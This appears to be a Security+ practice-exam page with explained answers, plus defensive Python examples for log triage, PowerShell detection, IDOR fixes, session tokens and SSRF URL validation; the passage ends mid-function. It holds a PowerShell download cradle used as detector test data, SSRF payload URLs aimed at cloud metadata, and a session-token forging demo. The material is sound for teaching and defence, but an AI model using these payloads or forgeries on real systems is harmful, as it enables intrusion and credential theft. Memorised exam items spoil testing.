Based on the exhibit, what is the BEST fix for the vulnerability being exploited?
A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.
A.Add client-side JavaScript to hide document IDs from the user interface.
B.Enforce server-side object-level authorization checks before returning any document.
C.Require users to change passwords more frequently to prevent unauthorized document access.
D.Place the document server behind a load balancer to prevent direct access to the application.
AnswerB
The application is returning objects to an authenticated user without verifying whether that user is allowed to access each specific record.
Why this answer
The vulnerability is an Insecure Direct Object Reference (IDOR), where the application trusts user-supplied input (the `docId` parameter) without verifying that the authenticated user is authorized to access the requested document. The best fix is to enforce server-side object-level authorization checks before returning any document, ensuring that the server validates the user's permissions against the specific resource ID before processing the request.
Exam trap
The trap here is that candidates may confuse client-side hiding (option A) with a valid security control, but the SY0-701 exam emphasizes that all access control must be enforced server-side, as client-side controls are trivially bypassed.
How to eliminate wrong answers
Option A is wrong because client-side JavaScript hiding of document IDs is security by obscurity and can be easily bypassed by inspecting network traffic or modifying requests with tools like Burp Suite; it does not prevent direct manipulation of the `docId` parameter. Option C is wrong because requiring more frequent password changes addresses credential management, not authorization flaws; it does not prevent an authenticated user from accessing unauthorized documents via IDOR. Option D is wrong because placing the document server behind a load balancer only distributes traffic and does not enforce any authorization checks; it does not mitigate the underlying issue of missing access controls on individual objects.
A security analyst reviews authentication logs and notices multiple failed login attempts using various usernames from a single IP address over several hours. Eventually, a successful login occurs using a username that had many failed attempts. The organization requires multi-factor authentication (MFA). Which type of attack is most likely indicated by this pattern?
A.Credential stuffing
B.Brute-force attack
C.Password spraying
D.Shoulder surfing
AnswerA
Credential stuffing replays username/password pairs leaked in earlier breaches against a new target. Many failed attempts spread across different usernames from one source IP, ending in a successful login, matches an attacker working through a stolen credential list. MFA still stands between the attacker and the account: the attacker has to obtain or bypass the second factor as well, for example by stealing a session token after a legitimate login, relaying the one-time code through a phishing page, or pushing prompts until the user approves one.
Why this answer
The pattern is characteristic of credential stuffing. The adversary feeds a list of username/password pairs exposed in earlier breaches into the login form, so one source IP touches many different usernames over several hours, and any account whose owner reused a breached password eventually logs in. Because the pairs are real credentials rather than guesses, a success is far more likely than under brute force, and the same username can fail several times if it appears in more than one breach dump with different passwords. The successful password check does not by itself defeat MFA; the attacker still needs the second factor, which is why the MFA requirement is noted. The log pattern itself, however, points to credential stuffing.
Exam trap
The trap here is confusing credential stuffing with password spraying: candidates often pick spraying because it also touches many usernames from one source, but spraying tries one or a few common passwords against every account and spaces attempts out to stay under lockout thresholds, so each username shows about one failure per round. Credential stuffing tries specific leaked passwords for each account, so the same username can show several distinct failures before the success seen here.
How to eliminate wrong answers
Option B (Brute-force attack) is wrong because a brute-force attack exhausts password guesses against one or a few accounts, not a rotating set of usernames from one source with a success on a real credential. Option C (Password spraying) is wrong because spraying uses a single common password against many usernames in a low-and-slow pattern; the logs here show repeated failures on the same username followed by a success, which is the opposite of one guess per account. Option D (Shoulder surfing) is wrong because it is physical observation of a user typing credentials and leaves no trail of remote failed logins in authentication logs.
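The triage logic behind the distinction above, as an added example that is not part of the page: a Python script that groups a constructed authentication log by source IP and labels each source as brute force, password spraying or credential stuffing using the signals the explanation names (number of distinct usernames, failures per username, and a success that follows failures). The log format, addresses, usernames and thresholds are constructed for the demo.

```python
"""Classify login-failure patterns per source IP from authentication logs.

Added example for the credential-stuffing question above; it is not part of
the page. The log format, addresses, usernames and thresholds are constructed
for the demo. It encodes the distinction the explanation draws:
  brute force          - one account, many guesses
  password spraying    - many accounts, about one guess each
  credential stuffing  - many accounts, several guesses on some of them,
                         typically ending in a success on a reused password
"""
import re
from collections import defaultdict

# Constructed line format: <ISO-8601 time> <source IP> <username> <SUCCESS|FAIL>
LINE_RE = re.compile(r"^(\S+) (\d{1,3}(?:\.\d{1,3}){3}) (\S+) (SUCCESS|FAIL)$")

# Constructed sample: three source IPs, three different behaviours.
SAMPLE_LOG = """\
2024-05-01T01:02:03Z 203.0.113.7 alice FAIL
2024-05-01T01:03:10Z 203.0.113.7 alice FAIL
2024-05-01T01:04:44Z 203.0.113.7 bob FAIL
2024-05-01T01:30:01Z 203.0.113.7 carol FAIL
2024-05-01T02:15:22Z 203.0.113.7 alice FAIL
2024-05-01T02:48:09Z 203.0.113.7 dave FAIL
2024-05-01T03:05:00Z 203.0.113.7 alice SUCCESS
2024-05-01T01:00:00Z 198.51.100.9 root FAIL
2024-05-01T01:00:01Z 198.51.100.9 root FAIL
2024-05-01T01:00:02Z 198.51.100.9 root FAIL
2024-05-01T01:00:03Z 198.51.100.9 root FAIL
2024-05-01T01:00:04Z 198.51.100.9 root FAIL
2024-05-01T04:00:00Z 192.0.2.44 eve FAIL
2024-05-01T04:20:00Z 192.0.2.44 frank FAIL
2024-05-01T04:40:00Z 192.0.2.44 grace FAIL
2024-05-01T05:00:00Z 192.0.2.44 heidi FAIL
"""


def summarize(lines):
    """Per source IP: failure count per username, and users who logged in
    after failing (the "success following failures" signal). Lines are
    assumed to be in chronological order per source."""
    stats = defaultdict(lambda: {"fails": defaultdict(int), "compromised": set()})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unrelated log line; ignore
        _ts, ip, user, result = m.groups()
        s = stats[ip]
        if result == "FAIL":
            s["fails"][user] += 1
        elif s["fails"].get(user):
            s["compromised"].add(user)
    return stats


def classify(ip_stats, min_users=3, min_guesses=4):
    """Label one source IP's activity. Thresholds are constructed defaults;
    tune them to the tenant's lockout policy and normal failure rate."""
    fails = ip_stats["fails"]
    if not fails:
        return "no-failures"
    users = len(fails)
    max_per_user = max(fails.values())
    if users < min_users and max_per_user >= min_guesses:
        return "brute-force"            # hammering one account
    if users >= min_users and max_per_user == 1:
        return "password-spraying"      # one guess per account, many accounts
    if users >= min_users:
        return "credential-stuffing"    # many accounts, repeated tries on some
    return "low-volume"


def analyze(log_text):
    """Map each source IP to (label, sorted accounts that succeeded after failing)."""
    return {
        ip: (classify(s), sorted(s["compromised"]))
        for ip, s in summarize(log_text.splitlines()).items()
    }


if __name__ == "__main__":
    for ip, (label, compromised) in analyze(SAMPLE_LOG).items():
        print(f"{ip:15} {label:20} success-after-failure: {compromised or '-'}")
```

The "success after repeated failures on the same account" signal is what should page an analyst; the label is only a hint for the investigation, since the same telemetry cannot see which passwords were tried.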
A help desk technician receives a call from a user who says many of their documents now have strange file extensions and a ransom note appeared on the desktop. The files will not open. What type of malware is the user most likely experiencing?
A.Spyware that silently records user activity over time
B.Ransomware that encrypts files and demands payment for recovery
C.A worm that spreads mainly by scanning for other hosts
D.A rootkit that hides malicious processes from the operating system
AnswerB
Ransomware commonly encrypts a victim's files and displays a demand for payment to restore access.
Why this answer
The user's symptoms, unopenable files with strange extensions and a ransom note, are classic indicators of ransomware. Ransomware typically encrypts files with a fast symmetric cipher such as AES and protects the per-victim key with the attacker's public key, then demands payment, usually in cryptocurrency, for the decryption key. This matches the scenario exactly: the files are rendered inaccessible and a note is left behind.
Exam trap
The trap here is that candidates may confuse ransomware with a worm because both can spread rapidly, but the key differentiator is the encryption of files and the presence of a ransom demand, which is unique to ransomware.
How to eliminate wrong answers
Option A is wrong because spyware focuses on covert data collection (e.g., keystroke logging, screen captures) and does not alter file extensions or display ransom notes; it operates silently to avoid detection. Option C is wrong because a worm self-replicates across networks by exploiting vulnerabilities (e.g., the SMB flaw used by EternalBlue) or scanning for open ports; spreading is its defining trait, not encrypting user documents and leaving a ransom note. Option D is wrong because a rootkit exists to hide processes and files from the operating system; announcing itself with renamed files and a ransom note is the opposite of its purpose.
A cloud-hosted image-processing API accepts a URL parameter so it can download a picture and generate a thumbnail. Logs show a user submitting `http://169.254.169.254/latest/meta-data/` and receiving instance credentials in the response. Which attack is being used?
A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB
SSRF tricks the server into making an internal request to a sensitive resource on the attacker’s behalf.
Why this answer
The attack is Server-Side Request Forgery (SSRF) because the API fetches whatever URL the user supplies, so the attacker points it at the instance metadata service on the link-local address 169.254.169.254. That address is reachable only from the instance itself, never from the attacker's machine, but the server fetches it on the attacker's behalf and returns the instance credentials in the thumbnail response. SSRF abuses the server's position on the network to reach internal or restricted resources.
Exam trap
The trap here is that candidates may confuse SSRF with CSRF because both involve 'forgery' and server requests, but SSRF originates from the server itself, while CSRF originates from a user's browser under the attacker's control.
How to eliminate wrong answers
Option A is wrong because Cross-Site Scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not manipulating server-side requests to internal IPs. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into performing unintended actions on a trusted site, not exploiting a server to fetch internal resources. Option D is wrong because SQL injection targets database queries through input fields, not HTTP requests to cloud metadata endpoints.
Based on the exhibit, what type of threat is the security team most likely seeing on the workstation?
A.Trojan
B.Fileless malware
C.Worm
D.Rootkit
AnswerB
The alert shows PowerShell launching with encoded commands, hidden execution, and no suspicious file written to disk. That behavior strongly suggests fileless malware, which relies on built-in tools and memory rather than dropping a traditional executable. The registry change also indicates persistence without a visible file-based payload.
Why this answer
The security team is most likely seeing fileless malware because the alert shows PowerShell launched with an encoded command and a hidden window, no suspicious file written to disk, and persistence established through a registry change rather than a dropped executable. Fileless malware runs in memory and abuses legitimate, signed system tooling such as PowerShell, WMI or .NET, so file-based, signature-driven antivirus has nothing to scan; detection has to come from process behaviour and command-line telemetry, which is exactly what the EDR surfaced.
Exam trap
The trap here is that candidates often confuse fileless malware with a Trojan because both can use PowerShell, but the key distinction is that fileless malware avoids writing to disk, while a Trojan relies on a dropped executable file.
How to eliminate wrong answers
Option A is wrong because a Trojan is a malicious program disguised as legitimate software that typically writes itself to disk and requires user execution, whereas the exhibit shows code running in memory without a persistent file. Option C is wrong because a worm is a self-replicating malware that spreads across networks by exploiting vulnerabilities, not by executing in-memory scripts on a single workstation. Option D is wrong because a rootkit is designed to hide its presence and maintain privileged access by modifying the operating system kernel or boot process, not by running transient in-memory scripts via PowerShell.
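Added example, not the exhibit and not the page's own content: a Python triage routine for the PowerShell behaviour the explanation describes. It decodes an -EncodedCommand argument (Base64 of UTF-16LE text), checks for a hidden window, and looks in the decoded script for in-memory execution indicators. The process-creation records are constructed, and the decoded sample is a generic download-cradle shape used only to exercise the detector.

```python
"""Triage PowerShell process-creation events for encoded, hidden execution.

Added example for the fileless-malware question above; it is not the
exhibit and not part of the page. The events below are constructed, and
the decoded payload is a widely documented download-cradle shape used only
to exercise the detector. It decodes -EncodedCommand (Base64 of UTF-16LE),
checks for a hidden window, and looks for in-memory execution indicators.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -en, -enc, ... -EncodedCommand all work. Build all of them.
_ENC_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                       key=len, reverse=True)
ENCODED_RE = re.compile(r"(?<!\S)-(?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]{16,})", re.I)
# -w, -win, -WindowStyle ... followed by "hidden"
HIDDEN_RE = re.compile(r"(?<!\S)-w\S*\s+hidden", re.I)

# Strings that mean "fetch or assemble code and run it in memory".
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadData",
              "FromBase64String", "Net.WebClient", "Reflection.Assembly", "-bxor")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE; treat as unencoded


def analyze(cmdline):
    """Structured verdict for one command line."""
    decoded = decode_encoded_command(cmdline)
    # Search the decoded script when there is one, so the Base64 blob itself
    # cannot produce accidental substring matches.
    script = decoded if decoded is not None else cmdline
    found = [i for i in INDICATORS if i.lower() in script.lower()]
    return {
        "encoded": decoded is not None,
        "hidden": HIDDEN_RE.search(cmdline) is not None,
        "decoded": decoded,
        "indicators": found,
        "suspicious": decoded is not None and bool(found),
    }


def _enc(script):
    """Encode a script the way `powershell -EncodedCommand` expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed decoded payload: a generic download cradle (non-routable host).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

EVENTS = [  # constructed process-creation records
    {"image": "powershell.exe", "parent": "taskeng.exe",
     "cmdline": f"powershell.exe -NoP -NonI -W Hidden -Enc {_enc(CRADLE)}"},
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": f"powershell.exe -EncodedCommand {_enc('Get-Date')}"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        verdict = analyze(ev["cmdline"])
        print(ev["parent"], "->", ev["image"], verdict["suspicious"], verdict["indicators"])
```

Encoding alone is not malicious (the third record decodes to `Get-Date`), which is why the verdict combines the decoded content with the hidden-window flag and, in a real pipeline, with the parent process and any registry write the same process made.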
A support agent notices that changing `invoiceId=8842` to `invoiceId=8843` in a portal URL returns another customer's invoice PDF without any additional login prompt. The user is already authenticated to the application. Which vulnerability is most likely present?
A.Cross-site scripting
B.Broken access control
C.SQL injection
D.Cross-site request forgery
AnswerB
Broken access control occurs when the application fails to properly verify whether an authenticated user is allowed to access a specific object or resource. Changing the invoice ID reveals that authorization is missing or weak.
Why this answer
The vulnerability is broken access control (B) because the application fails to verify that the authenticated user is authorized to access the resource identified by `invoiceId=8843`. By simply changing a numeric parameter in the URL, the user can view another customer's invoice PDF without any additional authentication or authorization check. This is a classic insecure direct object reference (IDOR) flaw, which falls under the broader category of broken access control.
Exam trap
The trap here is that candidates often confuse IDOR with SQL injection because both involve manipulating input parameters, but IDOR is about missing authorization checks, not database query injection.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not manipulating URL parameters to access unauthorized resources. Option C is wrong because SQL injection requires the attacker to inject SQL commands into input fields to manipulate the database, whereas here the parameter change directly accesses a different resource without any database manipulation. Option D is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing unintended actions on a web application, but the scenario describes the user directly changing a URL parameter, not being tricked into submitting a forged request.
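The same flaw appears in both the `docId` question earlier on this page and the `invoiceId` question above; one added example covers both. This is not the page's code: a minimal in-memory document store with the vulnerable handler (authenticated, never authorized) beside the fixed handler that checks the requesting user against the specific object before returning it. Users, ids and documents are constructed.

```python
"""Object-level authorization check for document retrieval.

Added example covering the two IDOR questions on this page (the `docId` and
`invoiceId` scenarios); not part of the page. The store, user names and ids
are constructed for the demo.
"""
from dataclasses import dataclass, field


class NotFound(Exception):
    """Raised for both missing and unauthorized objects (see get_document_fixed)."""


@dataclass
class Document:
    doc_id: int
    owner: str
    body: str
    shared_with: frozenset = field(default_factory=frozenset)


# Constructed sample data: two employees, three documents.
DOCUMENTS = {
    8842: Document(8842, "alice", "alice's Q3 invoice"),
    8843: Document(8843, "bob", "bob's Q3 invoice"),
    8844: Document(8844, "bob", "shared project plan", frozenset({"alice"})),
}


def get_document_vulnerable(session_user: str, doc_id: int) -> str:
    """The flawed pattern: authenticated, but never authorized.

    The caller proved who they are (session_user), yet the lookup keys
    only on the attacker-controlled doc_id, so any user can read any id.
    """
    doc = DOCUMENTS.get(doc_id)
    if doc is None:
        raise NotFound(doc_id)
    return doc.body


def can_read(user: str, doc: Document) -> bool:
    """Object-level policy: the owner or an explicitly shared recipient."""
    return user == doc.owner or user in doc.shared_with


def get_document_fixed(session_user: str, doc_id: int) -> str:
    """The fix: resolve the object, then check this user against *this* object.

    Returning the same error for "does not exist" and "not yours" stops an
    attacker from enumerating which ids are valid.
    """
    doc = DOCUMENTS.get(doc_id)
    if doc is None or not can_read(session_user, doc):
        raise NotFound(doc_id)
    return doc.body


def idor_possible(handler, attacker: str, victim_doc: int) -> bool:
    """True when `handler` hands `victim_doc` to `attacker` without an error."""
    try:
        handler(attacker, victim_doc)
        return True
    except NotFound:
        return False


if __name__ == "__main__":
    print("vulnerable leaks 8843 to alice:", idor_possible(get_document_vulnerable, "alice", 8843))
    print("fixed leaks 8843 to alice:    ", idor_possible(get_document_fixed, "alice", 8843))
```

The check lives next to the data access, not in the router or the UI, so every code path that can reach a document goes through it; that is what "server-side, per object" means in option B of the earlier question.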
After a user installs a free PDF converter from an unofficial site, the browser homepage changes, the endpoint protection agent stops launching, and the system begins making periodic outbound connections to the same unfamiliar IP address. No exploit was used during installation, and the installer appeared legitimate. What type of malware best matches this behavior?
A.Worm, because the infection is spreading automatically across the network.
B.Trojan, because it masquerades as useful software while delivering hidden malicious functionality.
C.Rootkit, because the attacker must have hidden files in the kernel.
D.Spyware, because the main symptom is that the browser homepage changed.
AnswerB
A trojan is designed to look legitimate so users willingly install it, which matches the fake PDF converter. The changed homepage, disabled security tool, and recurring outbound connections are classic signs that the program is not behaving like the advertised utility. Trojans often install additional payloads, create persistence, or open remote access without the user realizing the original software was malicious.
Why this answer
B is correct because the software masquerades as a legitimate PDF converter while secretly performing malicious actions—changing the browser homepage, disabling endpoint protection, and making unauthorized outbound connections. This is the classic definition of a Trojan horse: it appears useful but contains hidden, harmful functionality. The lack of an exploit and the user's voluntary installation further confirm it is a Trojan, not a self-replicating worm or a kernel-hiding rootkit.
Exam trap
The trap here is that candidates may confuse a Trojan with a worm because both can cause network activity, but the key differentiator is that a worm spreads autonomously without user action, whereas a Trojan requires the user to intentionally run the malicious file.
How to eliminate wrong answers
Option A is wrong because a worm self-replicates and spreads automatically across a network without user interaction, whereas this infection required the user to manually install the software. Option C is wrong because a rootkit specifically hides its presence by modifying kernel-level structures (e.g., hooking system calls or hiding processes/files), but the described symptoms—homepage change, disabled endpoint protection, and outbound connections—do not indicate kernel-level concealment. Option D is wrong because spyware primarily focuses on covert data collection (e.g., keystrokes, browsing habits), and while a changed homepage can be a side effect, the core behavior here includes disabling security software and establishing persistent C2 connections, which is more characteristic of a Trojan.
A vulnerability scan finds a critical flaw on an internet-facing SFTP gateway with public exploit code, and a high-severity flaw on an internal lab server that is only reachable from a restricted subnet. Which should be remediated first?
A.The internal lab server, because every high-severity finding should be fixed first.
B.The internet-facing SFTP gateway, because it has higher immediate risk.
C.Both systems can wait until the next scheduled maintenance window.
D.Neither system needs urgent action because the lab server is isolated.
AnswerB
Public exposure and known exploit code make the gateway the more urgent business risk.
Why this answer
The internet-facing SFTP gateway has a critical vulnerability with public exploit code, meaning it is exposed to the entire internet and can be directly attacked without any network restrictions. This creates an immediate and high-likelihood risk of remote code execution or data breach, whereas the internal lab server is isolated to a restricted subnet, significantly reducing its attack surface and exploitability. Remediation priority should be based on risk severity (likelihood × impact), not just CVSS score, making the SFTP gateway the correct first choice.
Exam trap
The trap here is that candidates fixate on the CVSS severity score (high vs. critical) without factoring in exposure, exploitability, and network segmentation, leading them to incorrectly prioritize the internal server over the internet-facing gateway.
How to eliminate wrong answers
Option A is wrong because it incorrectly assumes that all high-severity findings should be fixed first regardless of exposure; in reality, a critical flaw on an internet-facing system with public exploit code poses far greater immediate risk than a high-severity flaw on an isolated internal server. Option C is wrong because delaying remediation for a critical, internet-exposed vulnerability with known exploit code until the next scheduled maintenance window is unacceptable; such flaws require immediate action to prevent likely compromise. Option D is wrong because the lab server's isolation says nothing about the gateway; the internet-facing critical flaw with public exploit code needs urgent action regardless of how the internal server is segmented.
A help desk technician receives a phone call from someone who claims to be the CFO. The caller says they are traveling, cannot access their MFA app, and needs the technician to reset the account immediately. They also ask the technician to read back the one-time code sent to the executive's phone so they can "verify identity." What type of attack is this most likely?
A.Pretexting
B.Vishing
C.Smishing
D.Baiting
AnswerB
Vishing is voice-based phishing, and this attack uses a phone call to pressure the technician.
Why this answer
This is vishing (voice phishing) because the attacker uses a phone call to impersonate a trusted executive (the CFO) and manipulates the technician into bypassing MFA controls. The request to read back the one-time code is a classic social engineering tactic to capture a valid OTP, which the attacker can then use to authenticate as the CFO.
Exam trap
The trap here is that candidates may confuse vishing with pretexting, but vishing is the specific attack vector (voice call) while pretexting is the broader deception technique—the question asks for the type of attack, which is vishing.
How to eliminate wrong answers
Option A is wrong because pretexting is a broader category of fabricating a scenario to obtain information, but vishing is the specific delivery method (voice call) used here. Option C is wrong because smishing uses SMS/text messages, not a phone call. Option D is wrong because baiting involves offering something enticing (like a free USB drive) to trick a victim, not impersonating an authority figure over the phone.
Based on the exhibit, which social engineering attack is most likely?
A.Phishing, because the message is a broad email that tries to trick the recipient.
B.Spear phishing, because the email is tailored to a specific employee and business context.
C.Vishing, because the attacker is using a phone call to pressure the victim.
D.Baiting, because the attacker is offering a document that the user wants to open.
AnswerB
This is spear phishing because the message is customized for a particular recipient and business process. It references an internal project, uses an invoice theme, and pressures the target to change payment details quickly. That combination of personalization and urgency is designed to increase trust and bypass normal caution.
Why this answer
Option B is correct because spear phishing involves crafting a message that is personalized to a specific individual or role within an organization, often referencing internal names or processes to increase credibility. In the exhibit, the email is addressed to a specific employee, references a real internal project and a pending invoice, and presses for a quick change to payment details, which is the hallmark of spear phishing rather than a generic blast.
Exam trap
CompTIA often tests the distinction between generic phishing and spear phishing by including a message that appears personalized but still uses broad language, so candidates must look for specific contextual clues like the recipient's name or internal references to identify the targeted nature.
How to eliminate wrong answers
Option A is wrong because phishing typically refers to a mass, untargeted email sent to many recipients, whereas the exhibit shows a message tailored to a specific employee and business context. Option C is wrong because vishing (voice phishing) uses a phone call, not an email, to pressure the victim; the exhibit shows an email message. Option D is wrong because baiting involves offering an enticing item (e.g., a free USB drive or download) to trick the user, not a personalized email requesting action.
A security analyst is reviewing the session management implementation of a web application. The application generates session tokens by computing the MD5 hash of the concatenation of the username and the current server timestamp rounded to the nearest hour. An attacker has obtained a valid session token for her own account and discovers that she can forge tokens for other users by simply substituting the username in the hash calculation with a known target username. Which type of attack is the web application most vulnerable to?
A.Session hijacking via cross-site scripting (XSS)
B.Session replay attack
C.Session prediction
D.Session fixation
AnswerC
The session token is generated using the username and a timestamp with low granularity, making it possible for an attacker who knows the algorithm to calculate valid tokens for any user. This is a classic session prediction vulnerability.
Why this answer
The session token is MD5(username + timestamp rounded to the nearest hour). Both inputs are knowable: usernames are public or guessable, and the timestamp takes only 24 values per day, so anyone who knows the algorithm can reproduce the server's computation for any account; the attacker's own valid token merely lets her confirm which hour bucket the server is using. This is a classic session prediction vulnerability: the token carries no secret and no randomness, so there is nothing to guess.
Exam trap
The trap here is confusing session prediction with session hijacking via XSS or session replay, but the key clue is that the attacker can compute the token herself by substituting the username, which directly indicates a predictable token generation scheme.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into a web page to steal session tokens, but here the attacker already has a valid token and can forge tokens without needing to execute scripts in another user's browser. Option B is wrong because a session replay attack involves capturing and reusing a valid session token, but the attacker is not replaying a captured token; she is forging new tokens by altering the username in the hash calculation. Option D is wrong because session fixation requires the attacker to set a known session ID for the victim (e.g., via a link or cookie injection), but here the attacker is generating tokens independently, not fixing a session ID for the victim.
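The scheme from the question, worked through in Python as an added example (not part of the page): the weak token derivation, the attacker confirming the server's hour bucket from her own token and forging another user's, and the fix, a random token from the operating system CSPRNG mapped to the user in a server-side table. Usernames and the server time are constructed.

```python
"""Predictable vs. random session tokens.

Added example for the session-prediction question above; not part of the
page. It reproduces the scheme the question describes (MD5 of username plus
the hour-rounded server time), shows how an attacker who knows only the
algorithm forges another user's token, and contrasts a random token kept in
a server-side table. Usernames and timestamps are constructed.
"""
import hashlib
import secrets
import time

HOUR = 3600


def hour_bucket(ts):
    """Round a Unix time down to the hour, as the weak scheme does."""
    return int(ts // HOUR) * HOUR


def weak_token(username, now=None):
    """The scheme from the question. Inputs: a public username and a value
    that takes only 24 distinct values per day. No secret, no randomness."""
    ts = time.time() if now is None else now
    return hashlib.md5(f"{username}{hour_bucket(ts)}".encode()).hexdigest()


def recover_bucket(own_user, own_token, approx_now, window_hours=48):
    """Attacker step 1: confirm the server's hour bucket by checking her own
    token against nearby hours (absorbs clock skew and time zones)."""
    base = hour_bucket(approx_now)
    for h in range(-window_hours, window_hours + 1):
        candidate = base + h * HOUR
        if weak_token(own_user, candidate) == own_token:
            return candidate
    return None


def forge_token(target_user, bucket):
    """Attacker step 2: same algorithm, different username."""
    return weak_token(target_user, bucket)


# --- the fix: unpredictable token, identity kept server-side ---------------

def issue_random_session(username, sessions):
    """256 bits from the OS CSPRNG; the token encodes nothing about the user."""
    token = secrets.token_urlsafe(32)
    sessions[token] = username
    return token


def resolve_session(token, sessions):
    """Look the token up; a forged value simply is not in the table."""
    return sessions.get(token)


def random_scheme_properties():
    """Two sessions for one user get unrelated tokens, each resolves, and a
    guessed value resolves to nothing."""
    sessions = {}
    t1 = issue_random_session("alice", sessions)
    t2 = issue_random_session("alice", sessions)
    return (t1 != t2,
            resolve_session(t1, sessions) == "alice",
            resolve_session(secrets.token_urlsafe(32), sessions) is None)


if __name__ == "__main__":
    T = 1_700_000_000                      # constructed server time
    alice = weak_token("alice", T)         # attacker's own legitimate token
    bucket = recover_bucket("alice", alice, T + 5 * HOUR)
    print("forged token for bob matches:", forge_token("bob", bucket) == weak_token("bob", T))
    print("random scheme properties:", random_scheme_properties())
```

Swapping MD5 for SHA-256 would change nothing here; the weakness is the inputs, not the hash. A token must either be random and looked up server-side, as above, or be a MAC over its claims under a key the attacker does not have.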
A cloud-hosted application allows users to submit a URL for image processing. Logs show repeated requests such as `http://169.254.169.254/latest/meta-data/` and `http://localhost/admin`. The server is making outbound requests on behalf of the user input. What is the best defensive control to implement?
A.Allow any URL that returns a valid HTTP status code
B.Use a strict allowlist for outbound destinations and block link-local metadata addresses
C.Escape all quotation marks before sending the request
D.Require users to change their passwords after each upload
AnswerB
This is the best defense because the application is making server-side requests based on user input. A strict allowlist limits which external destinations the service may reach, and blocking link-local or internal addresses prevents access to sensitive metadata services and localhost resources. This directly reduces the risk of server-side request forgery in cloud environments.
Why this answer
The requests target the cloud instance metadata service (169.254.169.254, the link-local address used by AWS and several other providers) and localhost, which is classic Server-Side Request Forgery (SSRF). A strict allowlist of outbound destinations, with link-local, loopback and private address ranges explicitly denied, stops the server from reaching internal or cloud metadata endpoints. The check has to be applied to the address the server actually connects to, after DNS resolution and again on every redirect, or an attacker can register an allowed-looking hostname that resolves to an internal address. On AWS specifically, requiring IMDSv2 (session-oriented metadata requests) removes the simple GET that this attack relies on.
Exam trap
The trap here is that candidates may confuse SSRF with injection attacks and choose a sanitization option like escaping quotation marks, but the real vulnerability is the server's ability to make outbound requests to arbitrary destinations, which requires network-level controls.
How to eliminate wrong answers
Option A is wrong because allowing any URL that returns a valid HTTP status code would permit SSRF attacks, as attackers can craft URLs that reach internal services (e.g., metadata endpoints) that respond with a valid status. Option C is wrong because escaping quotation marks is a defense against injection attacks like SQL injection or XSS, but it does not prevent the server from making outbound requests to arbitrary destinations, which is the core issue in SSRF. Option D is wrong because password rotation concerns user credentials and has no effect on where the server sends outbound requests.
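An added example covering both SSRF questions on this page (the thumbnail API that read 169.254.169.254, and the allowlist defence chosen here); it is not the page's code. It validates a user-supplied URL the way option B describes: allowed scheme, no credentials in the URL, hostname on an allowlist, and every resolved address must be public, with IPv4-mapped IPv6 unwrapped so it cannot smuggle an internal address through. The allowed hostnames and the fake DNS answers are constructed, and the resolver is injectable so it runs offline.

```python
"""Validate a user-supplied fetch URL before the server requests it.

Added example for the two SSRF questions above; not part of the page. The
allowed hostnames, the fake DNS answers and the addresses are constructed.
The check: allowed scheme, no credentials in the URL, hostname on an
allowlist, and every address the name resolves to must be public. The
resolved addresses are returned so the caller can connect to one of *them*
instead of re-resolving the name (which would reopen DNS rebinding).
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.net"}   # constructed allowlist


def is_forbidden_address(ip_text):
    """Loopback, link-local (the metadata range), RFC 1918, shared, reserved,
    multicast or unspecified. IPv4-mapped IPv6 (::ffff:a.b.c.d) is unwrapped
    first so it cannot carry an IPv4 address past the check."""
    addr = ipaddress.ip_address(ip_text.split("%", 1)[0])   # drop any scope id
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_multicast or not addr.is_global


def check_fetch_url(url, resolver=socket.getaddrinfo):
    """Return (allowed, reason, resolved_addresses). `resolver` is injectable
    so the check can be tested without network access."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}", []
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed", []
    host = parts.hostname  # lower-cased, brackets stripped, userinfo removed
    if host is None or host not in ALLOWED_HOSTS:
        return False, f"host not in allowlist: {host!r}", []   # raw IPs and localhost fail here
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port", []
    try:
        answers = resolver(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror as exc:
        return False, f"resolution failed: {exc}", []
    addresses = sorted({sockaddr[0] for *_, sockaddr in answers})
    for ip_text in addresses:
        if is_forbidden_address(ip_text):
            return False, f"{host} resolves to internal address {ip_text}", addresses
    return True, "ok", addresses


# Constructed DNS answers; the addresses are placeholders, not real hosts.
FAKE_DNS = {
    "images.example.com": ["11.22.33.44"],
    "cdn.example.net": ["11.22.33.55", "10.0.0.9"],   # one record points inside
}


def fake_resolver(host, port, **_):
    """Shaped like socket.getaddrinfo results."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"no such host {host}")
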